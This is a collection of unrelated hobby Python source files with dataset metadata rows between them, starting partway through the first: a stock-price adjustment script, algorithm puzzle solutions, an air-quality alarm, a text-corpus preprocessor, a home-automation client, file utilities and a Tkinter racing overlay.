    conn = sqlite3.connect('d:\\hyb\\STOCKDATA.db')
    sql = "select rq as gqdjr,pgj,pgbl from pg where gpdm=='" + code + "';"
    frame = pd.read_sql_query(sql, con=conn)
    conn.close()
    frame['gqdjr'] = frame['gqdjr'].map(lambda x: x.replace('-', ''))
    frame['date'] = frame['gqdjr'].map(str2datetime)
    return frame.set_index('date')
###############################################################################
#合并分红配股数据,并按股权登记日降序排列
###############################################################################
def getfhpg(gpdm):
    """Merge dividend and rights-issue tables for a stock.

    Rows are sorted newest record date first and missing values become 0,
    so each row can be consumed directly by adj_close().
    """
    code = lgpdm(gpdm)
    merged = pd.merge(fhsql2pd(code), pgsql2pd(code), how='outer', on='gqdjr')
    merged = merged.sort_values(by='gqdjr', ascending=False)
    return merged.fillna(0)
###############################################################################
#长股票代码
###############################################################################
def lgpdm(dm):
    """Return the 6-digit code with its exchange suffix: .SH for 6xxxxx, else .SZ."""
    if dm[0] == '6':
        return dm[:6] + '.SH'
    return dm[:6] + '.SZ'
###############################################################################
#短股票代码
###############################################################################
def sgpdm(dm):
    """Return only the 6-digit stock code, stripping any exchange suffix."""
    code = dm[:6]
    return code
################################################################################
#提取DataFrame时间索引,返回日期
################################################################################
def df_timeindex_to_datelist(df):
    """Return the DatetimeIndex of ``df`` as a list of 'YYYYMMDD' strings.

    A plain comprehension replaces np.vectorize, which raised ValueError on
    an empty index and added nothing for this element-wise formatting.
    """
    return [ts.strftime('%Y%m%d') for ts in df.index.to_pydatetime()]
###############################################################################
#分红日期为股权登记日前复权收盘价
###############################################################################
def adj_close(df,fhpg):
    """Forward-adjust closes in ``df`` for the dividend/rights events in ``fhpg``.

    Pass 1 (events, newest first): on each record date, replace adj_close with
    the ex-rights reference price and seed the next trading day's pre_close /
    adj_rate. Pass 2 (dates, oldest first): rebuild the whole adj_close series
    by chaining adj_rate backward from each day's successor.
    Mutates ``df`` in place and returns it. Statement order is significant.
    """
    for i in range(len(fhpg)):
        # One event row: record date, cash dividend, bonus-share ratio,
        # rights price, rights ratio.
        date, fh, szg, pgj, pgbl = fhpg.iloc[i]
#        date=nextdtstr(date,-1)   # if given the ex-date, shift back one day to the record date
        fqyes = False    # event can only be applied if its record date is inside df's range
        if len(df.loc[date:date])==1 :  # the record date itself traded
            fqyes = True
        else :
            date = df_next_date(df,date,-1)  # otherwise fall back to the previous trading day
            if len(df.loc[date:date])==1 :  # found a prior trading day: adjust there
                fqyes = True
        if fqyes :
            oldclose = df.loc[date,'adj_close']
            # Standard ex-rights reference price formula.
            newclose = (oldclose - fh + pgj*pgbl)/(1+szg+pgbl)
            newclose = round(newclose,2)  # round half away, keep 2 decimals
            df.loc[date,'adj_close'] = newclose
            nextdate = df_next_date(df,date,1)
            if nextdate == None :
                break
            df.loc[nextdate,'pre_close'] = newclose
            df.loc[nextdate,'adj_rate'] = df.loc[nextdate,'close']/df.loc[nextdate,'pre_close']- 1
    ti = df_timeindex_to_datelist(df)
    ti.reverse()  # walk newest -> oldest so each day can use its successor
    for i in range(len(ti)):
        date = ti[i]
        if i== 0 :
            # Newest day keeps its adjusted close (self-assignment, no-op).
            df.loc[date,'adj_close'] = df.loc[date,'adj_close']
        else :
            # Discount the successor's adjusted close by its change rate.
            df.loc[date,'adj_close'] = next_close /(1+next_rate)
        next_close = df.loc[date,'adj_close']
        next_rate = df.loc[date,'adj_rate']
    return df
################################################################################
#提取DataFrame时间索引指定日期date前n个日期,返回日期
################################################################################
def df_next_date(df,date,n=0):
    """Return the trading date n positions after ``date`` in df's index.

    :param df: DataFrame with a DatetimeIndex of trading days
    :param date: 'YYYYMMDD' string (need not itself be a trading day)
    :param n: offset in trading days (negative = earlier)
    :return: 'YYYYMMDD' string, or None when date/result falls outside the range

    If ``date`` is not a trading day, the except branch walks back one
    calendar day at a time until a trading day is hit and returns it
    (ignoring n in that case). Terminates because date >= tmin was checked.
    """
    dftilst = df_timeindex_to_datelist(df)
    dftilst.sort()
    tmin = str2datetime(dftilst[0])
    tmax = str2datetime(dftilst[len(dftilst)-1])
    t = str2datetime(date)
    if t< tmin or t>tmax :
        return None
    try :
        i = dftilst.index(date)
        if i+n<0 or i+n>=len(dftilst) :
            return None
        else :
            return dftilst[dftilst.index(date)+n]
    except :
        # date is inside the range but not a trading day: scan backwards.
        while True :
            date = nextdtstr(date,-1)
            if date in dftilst :
                return date
##########################################################################
#n天后日期串,不成功返回None
##########################################################################
def nextdtstr(s,n):
    """Return the 'YYYYMMDD' string n days after s, or None if s is invalid."""
    parsed = str2datetime(s)
    if parsed is None:
        return None
    shifted = parsed + datetime.timedelta(n)
    return shifted.strftime("%Y%m%d")
###############################################################################
# 复权股价存入Sqlite3
###############################################################################
def qgjfq(gpdm):
    """Compute forward-adjusted prices for one stock and upsert them into GJ.

    Loads local TDX daily bars, applies the stock's dividend/rights events
    via adj_close(), then bulk-writes the result with INSERT OR REPLACE so
    reruns are idempotent on the (GPDM, RQ) unique key. Stocks without
    events are skipped entirely (nothing is written).
    """
    dbcn = sqlite3.connect('d:\\hyb\\STOCKDATA.db')
    gj=tdxday2pd(gpdm)
    fhpg = getfhpg(gpdm)
    if len(fhpg)>0 :
        fqgj=adj_close(gj,fhpg)
        fqgj['gpdm']=lgpdm(gpdm)
        # Column order must match the INSERT placeholders below.
        fqgj=fqgj.loc[:,['gpdm','date','open','high','low','close','amout','volume',
                         'rate','pre_close','adj_rate','adj_close']]
        data=np.array(fqgj).tolist()
        dbcn.executemany('''INSERT OR REPLACE INTO GJ (GPDM,RQ,OPEN,HIGH,LOW,CLOSE,
                         AMOUT,VOLUME,RATE,PRE_CLOSE,ADJ_RATE,ADJ_CLOSE)
                         VALUES (?,?,?,?,?,?,?,?,?,?,?,?)''', data)
        dbcn.commit()
    dbcn.close()
if __name__ == '__main__':
    # Ensure the target table exists, then set a sample stock code.
    createDataBase()
    dm='002673'  # NOTE(review): dm is unused here; presumably a qgjfq(dm) call was truncated
| RoveAllOverTheWorld512/hyb_bak | fhpgsql2pd.py | fhpgsql2pd.py | py | 11,493 | python | de | code | 0 | github-code | 90 |
# -*- coding: utf-8 -*-
# Fix: dataset sequence-id junk was fused onto the first line of this file.
"""
Created on Sun May 10 17:43:29 2020

@author: shinba
"""
n = int(input())
s = input()
t = input()
l = 0
# Find the longest suffix of s that is also a prefix of t; the merged
# string s + t can then share those l characters.
for i in range(n):
    if s[i:] == t[:n-i]:
        l = n-i
        break
print(2*n-l)
| Aasthaengg/IBMdataset | Python_codes/p03951/s501331802.py | s501331802.py | py | 230 | python | en | code | 0 | github-code | 90 |
# Fix: dataset sequence-id junk was fused onto the first import line.
from json import *
from time import *
from gpio import *
from realhttp import *
from tcp import *
from udp import *
# Vars and Globals
should_alert = False
message = ''
alarm_status = ''
data_carbon = 0
data_aqi = 0
PIN_LCD = 0
THRESH = 1670 # THRESH is the Threshold, New Zealand has the Ambiant set to 10 milligrams per cubic
TENMIN = 600
# Networking
IPV4_DEST_IP = '192.168.0.18'
PORT = 5000
# API URL Stuff
lat = -43.5379285
lon = 172.6416436
appid = 'b6f2ab6d117dde167c890593abb7ef56'
API_URL = "http://api.openweathermap.org/data/2.5/air_pollution?lat={}&lon={}&appid={}".format(lat,lon,appid)
# CODE
def startup():
    """Reset module state: clear the alarm status string shown on the LCD."""
    global alarm_status
    alarm_status = ''
def writeLCD(msg):
    """Show ``msg`` on the LCD wired to PIN_LCD (customWrite comes from the gpio lib)."""
    customWrite(PIN_LCD, msg)
def onHTTPDone(status, data):
    """HTTP completion callback: update CO/AQI globals and the alert state.

    NOTE(review): the real air-pollution API parsing is commented out below
    ("invalid Key"); c_data/aqi are hard-coded test values until the API key
    works, so the alarm currently always trips (2000 >= THRESH).
    """
    global data_carbon
    global data_aqi
    global should_alert
    global alarm_status
    """
    Currently getting invalid Key - using temp nums instead
    """
    j_data = loads(data)
    # print(data)
    # aqi = j_data['list'][0]['main']['aqi']
    # c_data = j_data['list'][0]['components']['co']
    c_data = 2000
    aqi = 1
    data_carbon = c_data
    data_aqi = aqi
    # Alarm when the CO reading is at or above the configured threshold.
    if c_data >= THRESH:
        should_alert = True
        alarm_status = 'ALARM'
    else:
        should_alert = False
        alarm_status = 'Normal'
def send_instruction(instruction):
    """Send one instruction string to the alarm SBC over TCP and disconnect.

    TCPClient comes from the tcp library; delay() presumably waits in
    milliseconds to let the connection settle — TODO confirm units.
    """
    client = TCPClient()
    client.connect(IPV4_DEST_IP, PORT)
    delay(50)
    client.send(instruction)
    delay(50)
    client.close()
def main():
    """Poll the air-pollution API forever, updating the LCD and remote alarm.

    Each cycle: fire the (async) HTTP GET whose callback refreshes the
    globals, show AQI + status on the LCD, and tell the alarm SBC to
    start or stop depending on should_alert.
    """
    global message
    global alarm_status
    startup()
    http = RealHTTPClient()
    http.onDone(onHTTPDone)
    while True:
        http.get(API_URL)
        print(data_aqi, data_carbon)
        if should_alert == True:
            writeLCD("AQI: " + str(data_aqi) + '\n' + "Status: " + alarm_status)
            message = 'StartAlarm'
            send_instruction(message)
        else:
            writeLCD("AQI: " + str(data_aqi) + '\n' + "Status: " + alarm_status)
            message = 'StopAlarm'
            send_instruction(message)
        # sleep(TENMIN)
        sleep(5) # This is for testing
# Fix: dataset metadata junk was fused onto the main() call line.
if __name__ == '__main__':
    main()
# Fix: dataset junk was fused onto the first and last lines of this file.
# For each person: friend-candidates = component size - direct friends
# - blocked users inside the same component - themselves.
N, M, K = map(int, input().split())
friend = {}
for i in range(M):
    A, B = map(lambda x: x-1, map(int, input().split()))
    if A not in friend:
        friend[A] = []
    if B not in friend:
        friend[B] = []
    friend[A].append(B)
    friend[B].append(A)
block = {}
for i in range(K):
    C, D = map(lambda x: x-1, map(int, input().split()))
    if C not in block:
        block[C] = []
    if D not in block:
        block[D] = []
    block[C].append(D)
    block[D].append(C)
# first[v] = representative (BFS root) of v's connected component.
first = {}
for i in range(N):
    if i not in first:
        first[i] = i
        if i in friend:
            queue = []
            queue.extend(friend[i])
            counter = 0
            while counter < len(queue):
                item = queue[counter]
                first[item] = i
                if item in friend:
                    for n in friend[item]:
                        if n not in first:
                            queue.append(n)
                counter += 1
# size[root] = number of members in that component.
size = {}
for key in first:
    if first[key] not in size:
        size[first[key]] = 1
    else:
        size[first[key]] += 1
for i in range(N):
    if i not in friend:
        print(0)
        continue
    # Count blocked users that share i's component.
    no_friend = 0
    if i in block:
        for b in block[i]:
            if first[b] == first[i]:
                no_friend += 1
    print(size[first[i]] - len(friend[i]) - no_friend - 1)
# Fix: dataset sequence-id junk was fused onto the first import line.
import os
from glob import glob
from tqdm import tqdm
import pandas as pd
from syntok.tokenizer import Tokenizer
def chunks(tokens, chunksize):
    """Yield successive ``chunksize``-sized slices of ``tokens``; the last
    slice may be shorter."""
    for start in range(0, len(tokens), chunksize):
        chunk = tokens[start:start + chunksize]
        yield chunk
def main(chunksize=1000):
    """Build a chunked, stopword-filtered corpus for topic modeling.

    Reads books from gutenberg-clean.ol (one "name<TAB>text" line each),
    keeps only ids present in the metadata subset, lowercases and tokenizes
    the text, drops stopwords/punctuation/numbers, and writes fixed-size
    chunks to chunkedcorpus.txt as "name_i<TAB>name_i<TAB>tokens" lines.
    """
    md = pd.read_csv('metadata-pg-genres-subset.tsv', sep='\t')
    ids = set(md['id'])
    with open('sw_jockers.txt') as inp:
        stopwords = set(inp.read().splitlines())
    # Also drop bare punctuation, long dashes/ellipses, and clitics.
    stopwords.update('.,?!:;-_&%$*#+=()[]/"\'')
    stopwords.update({'--', '---', '...',
            "'s", "'t", "'m", "n't", "'ve", "'ll", "n't", "'re", "'d"})
    tok = Tokenizer(replace_not_contraction=False)
    with open('chunkedcorpus.txt', 'w', encoding='utf8') as out:
        with open('gutenberg-clean.ol', encoding='utf8') as inp:
            for line in tqdm(inp):
                name, text = line.split('\t', 1)
                if name not in ids:
                    continue
                # Space out double dashes so the tokenizer splits them off.
                text = text.lower().replace('--', ' -- ')
                tokens = [token.value for token in tok.tokenize(text)
                        if token.value not in stopwords
                        and not token.value.isnumeric()]
                for n, chunk in enumerate(chunks(tokens, chunksize)):
                    out.write('%s_%d\t%s_%d\t%s\n' % (
                        name, n, name, n, ' '.join(chunk)))
if __name__ == '__main__':
main()
| andreasvc/fictiongenres | topicmodelpreprocess.py | topicmodelpreprocess.py | py | 1,250 | python | en | code | 0 | github-code | 90 |
#
# web_server_status.py
#
# Implements interfacing with the KotakeeOS central home automation
# web server. A single static class should be utilized for all
# speech_server interactions.
import threading
import requests
import json
import datetime
class WebServerStatus:
  """Single point of contact between the speech server and the KotakeeOS
  central home automation web server, plus internet / cloud-inference
  connectivity probes.

  Network work is dispatched on daemon threads so callers never block;
  the *_status flags record the last known connectivity state.

  Fixes: dropped the useless bindings of Thread(...).start() (always
  None), narrowed bare ``except:`` clauses to ``except Exception`` so
  KeyboardInterrupt/SystemExit propagate, and made implicit-None returns
  explicit where a bool was documented.
  """
  web_server_ip_address = None
  action_states = None
  home_status = None
  action_states_last_update = 0
  home_status_last_update = 0

  # Tells other components if we believe we are connected to the
  # internet and/or local web server and/or cloud inference
  # server.
  online_status = False
  web_server_status = False
  cloud_inference_status = False

  def __init__(self, ip_address, cloud_inference_address, use_cloud_inference):
    self.web_server_ip_address = ip_address
    self.cloud_inference_address = cloud_inference_address
    self.use_cloud_inference = use_cloud_inference
    # Request server statuses right on startup.
    self.execute_query_server_thread()

  def execute_query_server_thread(self):
    """
    Non-blocking query to fill status objects as well as to
    check connectivity with home infrastructure + internet.
    """
    threading.Thread(target=self.query_action_states, daemon=True).start()
    threading.Thread(target=self.query_home_status, daemon=True).start()
    threading.Thread(target=self.test_wide_internet, daemon=True).start()
    # If we have disabled cloud inference, just never query for it's
    # status. We'll act like we're not connected.
    if self.use_cloud_inference:
      threading.Thread(target=self.test_cloud_inference_server, daemon=True).start()

  # Queries server for states of all modules.
  def query_action_states(self):
    """Refresh self.action_states from /actionStates and update the flag."""
    query = self.web_server_ip_address + "/actionStates/" + str(self.action_states_last_update)
    print("[DEBUG] Querying server: " + query)
    try:
      response = requests.get(query)
      if(response.status_code == 200):
        self.action_states = json.loads(response.text)
        self.action_states_last_update = self.action_states['lastUpdate']
        print("[DEBUG] Action States request received successfully. action_states_last_update is now: " + str(self.action_states_last_update))
      elif(response.status_code != 204):
        print("[WARNING] Server rejected request with status code " + str(response.status_code) + ".")
      self.web_server_status = True
    except Exception:
      print("[WARNING] query_action_states unable to connect to server.")
      self.web_server_status = False

  # Queries server for misc non-module information
  def query_home_status(self):
    """Refresh self.home_status from /homeStatus and update the flag."""
    query = self.web_server_ip_address + "/homeStatus/" + str(self.home_status_last_update)
    print("[DEBUG] Querying server: " + query)
    try:
      response = requests.get(query)
      if(response.status_code == 200):
        self.home_status = json.loads(response.text)
        self.home_status_last_update = self.home_status['lastUpdate']
        print("[DEBUG] Home Status request received successfully. home_status_last_update is now: " + str(self.home_status_last_update))
      elif(response.status_code != 204):
        print("[WARNING] Server rejected request with status code " + str(response.status_code) + ".")
      self.web_server_status = True
    except Exception:
      print("[WARNING] query_home_status unable to connect to server.")
      self.web_server_status = False

  # Function to check true wide internet connectivity.
  def test_wide_internet(self):
    """Probe google.com; record and return the online flag."""
    connection_status = False
    try:
      requests.head('http://www.google.com/', timeout=10)
      connection_status = True
    except Exception:
      pass
    self.online_status = connection_status
    return connection_status

  def test_cloud_inference_server(self):
    """Probe the cloud inference server; record and return the flag."""
    connection_status = False
    try:
      requests.head(self.cloud_inference_address, timeout=10)
      connection_status = True
    except Exception:
      pass
    self.cloud_inference_status = connection_status
    return connection_status

  # Returns time of sunset and sunrise, but only if we're connected
  # to the web server (which is our source for openweathermap API
  # information).
  #
  # Converts from float time (since the beginning of time) to a more
  # tractable hours/minutes format.
  def get_sunrise_sunset_time(self):
    """Return (sunrise_h, sunrise_m, sunset_h, sunset_m) ints, or four Nones
    when disconnected, when home_status is missing, or on a parse error."""
    if self.web_server_status is True:
      try:
        if self.home_status is not None:
          sunset_time = float(self.home_status["weatherData"]["sys"]["sunset"])
          sunrise_time = float(self.home_status["weatherData"]["sys"]["sunrise"])
          # Convert epoch seconds into local-time hours/minutes.
          sunset_datetime = datetime.datetime.fromtimestamp(sunset_time)
          sunrise_datetime = datetime.datetime.fromtimestamp(sunrise_time)
          sunset_hours = int(sunset_datetime.strftime("%H"))
          sunset_minutes = int(sunset_datetime.strftime("%M"))
          sunrise_hours = int(sunrise_datetime.strftime("%H"))
          sunrise_minutes = int(sunrise_datetime.strftime("%M"))
          print("[DEBUG] Web Server Status Sunset: " + str(sunset_hours) + ":" + str(sunset_minutes) + " Sunrise: " + str(sunrise_hours) + ":" + str(sunrise_minutes) + ".")
          return sunrise_hours, sunrise_minutes, sunset_hours, sunset_minutes
      except Exception as e:
        print("[ERROR] Web Server Status was unable to correctly parse sunset/sunrise time! Exception:")
        print(e)
    return None, None, None, None

  # Creates a thread that queries server to turn speech server signal
  # light on/off.
  def query_speech_server_module_toggle(self, toState, roomId, actionId):
    query = self.web_server_ip_address + "/moduleToggle/"+str(roomId)+"/"+str(actionId)+"/" + str(toState)
    threading.Thread(target=self.execute_get_query, args=(query,), daemon=True).start()

  # Creates a thread that queries server providing input.
  def query_speech_server_input(self, toState, roomId, actionId):
    query = self.web_server_ip_address + "/moduleInput/"+str(roomId)+"/"+str(actionId)+"/" + str(toState)
    threading.Thread(target=self.execute_get_query, args=(query,), daemon=True).start()

  # Formats, and creates a thread to query the server with a simple
  # POST query.
  def query_speech_server_module_input_modify(self, data_to_send):
    query = self.web_server_ip_address + "/moduleInputModify"
    threading.Thread(target=self.execute_post_query, args=(query,data_to_send), daemon=True).start()

  def query_speech_server_piano_play(self, data_to_send):
    """Ask the server to play a MIDI file on the piano (async)."""
    query = self.web_server_ip_address + "/pianoPlayMidi"
    threading.Thread(target=self.execute_post_query, args=(query,data_to_send), daemon=True).start()

  def query_speech_server_piano_stop(self):
    """Ask the server to stop MIDI playback (async)."""
    query = self.web_server_ip_address + "/pianoStopMidi"
    threading.Thread(target=self.execute_get_query, args=(query,), daemon=True).start()

  # Returns True if pianoStatus is true (currently playing.)
  def query_speech_server_piano_status(self):
    """Synchronously ask whether MIDI is playing; False on any failure.
    (A 204 response now explicitly returns False; it used to return None.)"""
    query = self.web_server_ip_address + "/pianoStatus"
    print("[DEBUG] Querying server: " + query)
    try:
      response = requests.get(query)
      if(response.status_code == 200):
        return True
      elif(response.status_code != 204):
        print("[WARNING] Server rejected /pianoStatus request with status code " + str(response.status_code) + ".")
      return False
    except Exception:
      print("[WARNING] query_speech_server_piano_status unable to connect to server.")
      return False

  # Executes a simple GET query and expects the status code to be 200.
  def execute_get_query(self, query):
    print("[DEBUG] Executing GET query: " + query + "\n")
    try:
      response = requests.get(query)
      if(response.status_code == 200):
        print("[DEBUG] Request received successfully.")
      else:
        print("[WARNING] Server rejected request with status code " + str(response.status_code) + ".")
      self.web_server_status = True
    except Exception as e:
      print("[WARNING] execute_get_query unable to connect to server. Exception:")
      print(e)
      self.web_server_status = False

  # Executes a simple POST query and expects the status code to be 200.
  def execute_post_query(self, query, data_to_send, timeout=5, verbose = True):
    if verbose:
      print("[DEBUG] Executing POST query: " + query + " with body:")
      print(data_to_send)
    try:
      response = requests.post(query, data=json.dumps(data_to_send, indent = 4), headers = {'Content-Type': 'application/json'}, timeout=timeout)
      if(response.status_code == 200):
        if verbose: print("[DEBUG] Request received successfully.")
      else:
        print("[WARNING] Server rejected request with status code " + str(response.status_code) + ".")
      self.web_server_status = True
      return response
    except Exception as e:
      print("[WARNING] execute_post_query unable to connect to server. Exception:")
      print(e)
      self.web_server_status = False
      return None

  # Given the possible command string, roomId, actionId, and
  # a binary set of states, return a query.
  #
  # If the command contains the keyword "virtual", a virtual
  # module toggle will be created instead of physical.
  def generate_query(self, command, roomId, actionId, onState, offState):
    """Build a toggle URL from a spoken command; None when the desired
    state cannot be determined (no on/off keyword and no cached states)."""
    endpoint = "/moduleToggle/"
    if "virtual" in command:
      endpoint = "/moduleVirtualToggle/"
    if("off" in command or "deactivate" in command):
      return self.web_server_ip_address + endpoint +str(roomId)+"/"+str(actionId)+"/" + str(offState)
    elif("on" in command or "activate" in command or "initialize" in command):
      return self.web_server_ip_address + endpoint +str(roomId)+"/"+str(actionId)+"/" + str(onState)
    else:
      # No on or off specified. Check queried information.
      if(self.action_states is not None):
        if(self.action_states[str(roomId)][str(actionId)] == int(onState)):
          return self.web_server_ip_address + endpoint +str(roomId)+"/"+str(actionId)+"/" + str(offState)
        else:
          return self.web_server_ip_address + endpoint+str(roomId)+"/"+str(actionId)+"/" + str(onState)
      # States unknown: keep the original implicit-None behavior, explicitly.
      return None
| ArthurlotLi/kotakee_companion | speech_server/web_server_status.py | web_server_status.py | py | 10,449 | python | en | code | 2 | github-code | 90 |
"""
ファイルやフォルダの操作を行う関数群.
"""
import os
import glob
import pathlib
import platform
import datetime
def makedirs_plus(dir_path, permission=0o2777):
    '''
    Create dir_path (including parents) if it does not exist, then set its
    permission bits; do nothing when it already exists.

    Fix: the original checked os.path.exists() before os.makedirs(), which
    is racy (TOCTOU); catching FileExistsError keeps the same semantics
    atomically.

    :param dir_path: directory path to create
    :param permission: mode for os.chmod on the created leaf, default fully open
    :return: None
    '''
    try:
        os.makedirs(dir_path)
    except FileExistsError:
        return
    os.chmod(dir_path, permission)
def creation_date(filepath):
    """Return the file's creation time regardless of the running OS.

    On Windows this is os.path.getctime. Elsewhere, st_birthtime is tried
    (available on macOS/BSD); non-Mac UNIX systems do not expose a creation
    time, so the last-modification time is returned instead.

    :param filepath: path of the file whose creation time is wanted
    :return: timestamp in seconds since the epoch (float)
    """
    if platform.system() == 'Windows':
        return os.path.getctime(filepath)
    info = os.stat(filepath)
    try:
        return info.st_birthtime
    except AttributeError:
        # Non-Mac UNIX: no birth time available, fall back to mtime.
        return info.st_mtime
def listdir_sort(target_dir, target_exp='', subfolder=False, sort_by='name'):
    """Return files under target_dir matching the extension, sorted.

    :param target_dir: directory to search
    :param target_exp: extension appended to the glob pattern (e.g. '.csv')
    :param subfolder: when True, also search subdirectories recursively
    :param sort_by: 'name' (ascending) or 'create_date' (newest first)
    :return: sorted list of path strings
    """
    pattern = ('**/*' if subfolder else '*') + target_exp
    paths = [str(p) for p in pathlib.Path(target_dir).glob(pattern)]
    if sort_by == 'name':
        paths.sort()
    elif sort_by == 'create_date':
        dated = [(datetime.datetime.fromtimestamp(creation_date(p)), p) for p in paths]
        dated.sort(reverse=True)
        paths = [p for _, p in dated]
    return paths
| sikakusosi/kutinawa | kutinawa/kutinawa_fileOP.py | kutinawa_fileOP.py | py | 2,575 | python | ja | code | 1 | github-code | 90 |
20465691989 | import sys
input = sys.stdin.readline
n, m = map(int, input().split())
arr = []
def recur(num, count):
if count == m: # 기저 조건
print(*arr)
return
for i in range(num, n+1):
arr.append(i)
recur(i, count+1)
arr.pop()
recur(1, 0) | undervi/coding_test_python | 백준/Silver/15652. N과 M (4)/N과 M (4).py | N과 M (4).py | py | 309 | python | en | code | 1 | github-code | 90 |
# Fix: dataset sequence-id junk was fused onto the first import line.
import threading
import time
from tkinter import Tk, Label, StringVar, Frame, Button, Toplevel, Scale, messagebox
import logging
# from functools import partial # allows for passing both a function as well as its arguments, in case of "command=partial(func, arg1, arg2)"
from previous_versions.very_old_code.load_config import load_config, save_in_config
from src.frontend.hover_info import HoverInfoWindow
class ChildScreen:
    """Base class for secondary (Toplevel) windows spawned from the main screen.

    Handles sizing, centering on the display, and optional click-drag moving
    of the window via mouse-button bindings.
    """
    def __init__(self, parent_obj, width=None, height=None):
        """Create a Toplevel child of parent_obj.master; width/height optional."""
        self.parent_obj = parent_obj
        self.master = Toplevel(self.parent_obj.master)
        self.width = width
        self.height = height
        self.set_window_size()
        # Load the configuration file
        load_config(self)
    def set_window_size(self):
        """
        Changes the geometry of the master window in case desired dimensions are given
        (if not given, the window's size will automatically adjust to contents inside)
        """
        if self.width and self.height:
            self.master.geometry('%dx%d' % (self.width, self.height))
    def open_in_middle(self):
        """
        Opens the window in the middle of the screen
        :return:
        """
        # get screen width and height
        ws = self.master.winfo_screenwidth()  # width of the screen
        hs = self.master.winfo_screenheight()  # height of the screen
        # calculate x and y coordinates for the Toplevel master window
        x = (ws / 2) - (self.width / 2)
        y = (hs / 2) - (self.height / 2)
        # Add offsets to center the window
        self.master.geometry('+%d+%d' % (x, y))
    def start_move(self, event):
        """Remember the click position when a drag starts."""
        self.x = event.x
        self.y = event.y
    def stop_move(self, event):
        """Forget the drag anchor when the mouse button is released."""
        self.x = None
        self.y = None
    def do_move(self, event):
        """Move the window by the mouse delta (assumes start_move ran first)."""
        deltax = event.x - self.x
        deltay = event.y - self.y
        x = self.master.winfo_x() + deltax
        y = self.master.winfo_y() + deltay
        self.master.geometry(f"+{x}+{y}")
    def set_drag_bind(self, bl_bind_on):
        """Enable (True) or disable (False) dragging the window with mouse button 1."""
        if bl_bind_on:
            self.master.bind("<ButtonPress-1>", self.start_move)
            self.master.bind("<ButtonRelease-1>", self.stop_move)
            self.master.bind("<B1-Motion>", self.do_move)
        else:
            self.master.unbind("<ButtonPress-1>")
            self.master.unbind("<ButtonRelease-1>")
            self.master.unbind("<B1-Motion>")
class MainScreen:
    """Top-level application window offering buttons to open the overlays."""

    def __init__(self, master: Tk, telemetry, ir_conn, state, width, height):
        # Styling attributes (colors, fonts, button sizes) come from config.
        load_config(self)
        self.master = master
        self.master.iconbitmap("docs/RacingInsights_Logo.ico")
        self.master.title("RacingInsights")
        self.master.config(width=width, height=height, bg=self.bg_color)
        self.width = width
        self.height = height
        self.open_in_middle()
        # Track which child windows are currently open (one instance each).
        self.fuel_open = False
        self.settings_open = False
        self.telemetry = telemetry
        self.ir_conn = ir_conn
        self.state = state
        self.font = f'{self.font_style} {self.font_size} {self.font_extra}'
        self.button1 = Button(self.master, text='Open Fuel Overlay', font=self.font,
                              width=self.button_width, fg=self.fg_color,
                              height=self.button_height, command=self.open_fuel,
                              bg=self.button_color)
        self.button1.place(relx=0.5, rely=(1 / 3), anchor='center')
        self.button_settings = Button(self.master, text='Settings', font=self.font,
                                      width=self.button_width, height=self.button_height,
                                      fg=self.fg_color, bg=self.button_color,
                                      command=self.open_settings)
        self.button_settings.place(relx=0.5, rely=(2 / 3), anchor='center')

    def open_in_middle(self):
        """Size the root window and centre it on the screen."""
        screen_w = self.master.winfo_screenwidth()
        screen_h = self.master.winfo_screenheight()
        left = (screen_w / 2) - (self.width / 2)
        top = (screen_h / 2) - (self.height / 2)
        self.master.geometry('%dx%d+%d+%d' % (self.width, self.height, left, top))

    def open_fuel(self):
        """Open the fuel overlay (at most one instance) and its update thread."""
        if self.fuel_open:
            return
        self.fuel_app = FuelScreen(parent_obj=self, width=None, height=None,
                                   telemetry=self.telemetry, ir_conn=self.ir_conn,
                                   state=self.state)
        self.fuel_open = True

    def open_settings(self):
        """Open the settings window used to tweak overlay appearance."""
        if self.settings_open:
            return
        self.settings_open = True
        self.settings_app = SettingsScreen(parent_obj=self, width=1200, height=600)
class SettingsScreen(ChildScreen):
    """Window for live-tuning the fuel overlay's appearance.

    Slider changes are applied to the fuel overlay immediately; when this
    window is closed the user chooses whether to persist them to config.
    """

    def __init__(self, parent_obj, width, height):
        super().__init__(parent_obj, width, height)
        # Initialization
        self.master.config(bg=self.bg_color)
        self.master.title("Settings")
        self.open_in_middle()
        self.master.lift()
        self.master.protocol("WM_DELETE_WINDOW", self.on_closing)
        # Make sure the fuel app is open before building the UI elements in
        # SettingsScreen that are linked to it.
        # Fix: MainScreen defines open_fuel(); the original call to the
        # non-existent open_close_fuel() raised AttributeError.
        self.parent_obj.open_fuel()
        self.font = f'{self.font_style} {self.font_size} {self.font_extra}'
        self.init_visuals()

    def on_closing(self):
        """Offer to persist the current settings, restore lock state, close."""
        if messagebox.askyesno(title="Unsaved settings", message="Would you like to save these current settings?"):
            logging.info("The user asked to save the settings in the config file")
            self.save_settings_in_config()
        else:
            logging.info("The user asked not to save the settings, current config is reloaded")
            # Discard live changes: reload the saved config into the fuel
            # overlay, restore its saved position and rebuild its widgets.
            load_config(self.parent_obj.fuel_app)
            self.parent_obj.fuel_app.master.geometry(f"+{self.parent_obj.fuel_app.offset_right}+{self.parent_obj.fuel_app.offset_down}")
            # Fix: FuelScreen defines respawn_visuals(); the original call to
            # the non-existent update_visuals() raised AttributeError.
            self.parent_obj.fuel_app.respawn_visuals()
        self.lock_fuel_lock()
        logging.info("Settings window closed")
        # Set the settings_open boolean of the parent_obj to False to allow
        # for re-opening the settings window again.
        self.parent_obj.settings_open = False
        self.master.destroy()

    def save_settings_in_config(self):
        """Write the fuel overlay's current font/padding/position to config."""
        fuelscreen_font_size = self.fontsize_slider.get()
        fuelscreen_text_padding = self.textpadding_slider.get()
        fuelscreen_offset_right = self.parent_obj.fuel_app.master.winfo_x()
        fuelscreen_offset_down = self.parent_obj.fuel_app.master.winfo_y()
        save_in_config(font_size=["FUELSCREEN", fuelscreen_font_size],
                       text_padding=["FUELSCREEN", fuelscreen_text_padding],
                       offset_right=["FUELSCREEN", fuelscreen_offset_right],
                       offset_down=["FUELSCREEN", fuelscreen_offset_down])

    def init_visuals(self):
        """Build the two sliders (font size, text padding) and the lock button."""
        settings_block_width = 200
        settings_block_height = 100
        self.fontsize_frame = Frame(self.master, bg=self.bg_color, width=settings_block_width, height=settings_block_height)
        self.fontsize_frame.pack(pady=10)
        self.textpadding_frame = Frame(self.master, bg=self.bg_color, width=settings_block_width, height=settings_block_height)
        self.textpadding_frame.pack(pady=10)
        self.lockbutton_frame = Frame(self.master, bg="RED", width=settings_block_width, height=settings_block_height)
        self.lockbutton_frame.pack(pady=10)
